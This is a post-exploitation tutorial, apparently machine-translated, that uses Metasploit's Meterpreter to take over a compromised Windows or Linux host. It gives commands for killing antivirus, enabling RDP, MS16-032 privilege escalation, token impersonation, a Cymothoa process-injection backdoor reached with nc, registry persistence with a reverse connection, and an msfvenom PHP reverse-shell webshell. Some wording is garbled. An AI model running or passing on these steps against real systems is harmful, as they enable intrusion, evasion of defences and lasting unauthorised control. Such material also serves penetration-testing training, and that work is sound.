Process migration
When the shell was first obtained, the shell was extremely fragile and vulnerable. So the first step is to move the shell and bind it to a stable process in the target machine.
1. The ps command gets the running process of the target machine.
2. Getpid obtains the process number (PID) of
the shell 3. Know the process name of the shell through the process number.
4. Input migrate + PID of the bound process
5. Output getpid again, and find that the process number has become the process number that needs to be migrated, and the process migration is successful
System command
After the shell connection is stable, start to collect system information
1. sysinfo command to view the system information of the target machine
2. route command to view the complete network settings of the target machine 3.
background command to put the current session in the background
4. getuid command to check that the target machine has penetrated successfully user
5.run post / windows / manage / killav command to turn off anti-virus software target of
remote Desktop protocol 6.run post / windows / manage / enable_rdp command to start the target machine
7.run post / windows / gather / enum_logged_on_users list currently logged user
applications 8.run post / windows / gather / enum_applications recited installed on the target machine
9.shell command into the shell of the target
Right escalation
In the process of infiltration, we may just go back to a normal Guest or User authority. To proceed with the next infiltration, we must upgrade the access authority from Guest to User, then to Administrator, and finally to System authority.
There are two types of rights escalation:
- Vertical escalation: low-privileged roles gain the privileges of high-privileged roles
- Horizontal escalation: get the permissions of the same level role
So after successfully obtaining the Meterpreter shell of the target machine, we should first know that we now have the permissions
1. Enter shell under the Meterpreter shell and enter the CMD command line of the target machine
2. Enter whoami /groups to view our current permissions
Use WMIC to combat MS16-032 local overflow vulnerability
1. First enter the getuid command to check the permissions that have been obtained.
2. Then check the patched system: use the systeminfo command or query the ".log" file left in C:\windows\
3. Use the WMIC command to list the installed ones Patch
4. Then go to the EXP that raised the rights, and use the unnumbered EXP to raise the rights
5. Next, prepare to raise the rights, turn the Meterpreter session to background execution ( background) and search for MS16-032
6. Select the corresponding exp, and then specify The session performs the privilege escalation operation, set session 1
7. run
8. If the privilege escalation is successful, you can see that a new session has been created according to the returned information, and you getuidcan use it to view the current permissions
Token theft
Token temporary key (Token) is the system, the equivalent of an account name and password. Used to decide whether to allow this request and to determine which user this request belongs to. It allows you to access network and system resources without providing passwords or other credentials. These tokens will always exist in the system unless the system is restarted.
The principle of token stealing is that the attacker steals the token issued by the authentication server (AS) to the client of the server.
Practical use
1. Enter the use incognito command first, and then enter and exit list_tokens -u to list the available tokens
- Delegation Tokens: authorization tokens, which support interactive login (for example: can be accessed through remote desktop login)
- Impersonation Tokens: Impersonation tokens, which are non-interactive access.
2. We can see that the format of the token is like this: hostname/username
3. Call the impersonate_token command in incognito to impersonate an existing user to attack
impersonate_token 主机名\\用户名
4. After running successfully, run whoami under the Meterpreter shell and you can see that we are now the fake administrator.
Post-penetration attack: backdoor
After completing the privilege 9 promotion, it is time to establish a backdoor to maintain control of the target host. In this way, even if the vulnerabilities we exploit are fixed by the patch, we can continue to control the target system through the backdoor.
Operating system backdoor
Cymothoa backdoor
This is a backdoor tool that can inject ShellCode into an existing process (plug-in process). With this injection method, it can disguise ShellCode as a regular program. The backdoor program it injects should be able to coexist with the injected program (process) so as not to arouse the suspicion of management and maintenance personnel. Injecting ShellCode into other processes has another advantage: even if the security protection tool of the target system can monitor the integrity of the executable program, as long as it does not check the memory, it will not be able to find the process of the backdoor program (insertion process).
1. First check the PID of the program
- Linux : ps -aux
- Windows:tasklist
2. When using Cymothoa, you need to specify the PID of the target process through the -p option, and specify the ShellCode number through the -s option.
3. After successfully infiltrating the target host, you can copy the Cymothoa executable program to the target host to generate a backdoor program.
Cymothoa -p 982 -s 1 -y 4444 //选择PID为982的进程为宿主进程,选用第一类ShellCode,指定Payload的服务端口为4444
4. After success, you can connect to the backdoor of the target host (port 4444) through the following command
nc -nvv 192.168.x.x 4444
Persistence backdoor
persistence is a persistent backdoor program that uses the installation self-starting method, we can use it to create registration and files
1. Use the following command to create a persistent backdoor
Meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.x.x
- A: Automatically start the Payload program
- S: Load automatically when the system starts
- U: User login is automatically started
- X: Load automatically when booting
- i: time interval of back-to-back
- P: monitor reverse connection port number
- r: IP address of the target machine
2. If the creation is successful, you will see that the Meterpreter session has been established in the target machine system.
3. Enter sessions to view the sessions that have been successfully obtained
Web backdoor
Web backdoor generally refers to Webshell, which is actually a piece of web page code. The most familiar ones include: PHP, ASP, ASP.NET, JSP code, etc.
1.Meterpreter backdoor
In msf, there is a payload called PHP Meterpreter. This mode can be used to create a PHP Webshell with Meterpreter function.
- Use msfvenom to create a webshell.php
- Upload webshell.php to the target server
- Run Metasploit multi-handler to start monitoring
- Visit webshell.php page
- Get the Metasploit Shell with a big rebound
1. Make PHP Meterpreter through Metasploit's msfvenom tool
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.x.x -f raw > webshell.php
- -p parameter is used to set Payload
- -f parameter is used to set the output file format
2. Then upload webshell.php to the target server.
3. Then start msfconsole and use the following command to set up the monitor
4. Then open http://ip/webshell.php
5. Go back to msf, you can see that the server has rebounded successfully, and you can proceed to infiltrate the target host more deeply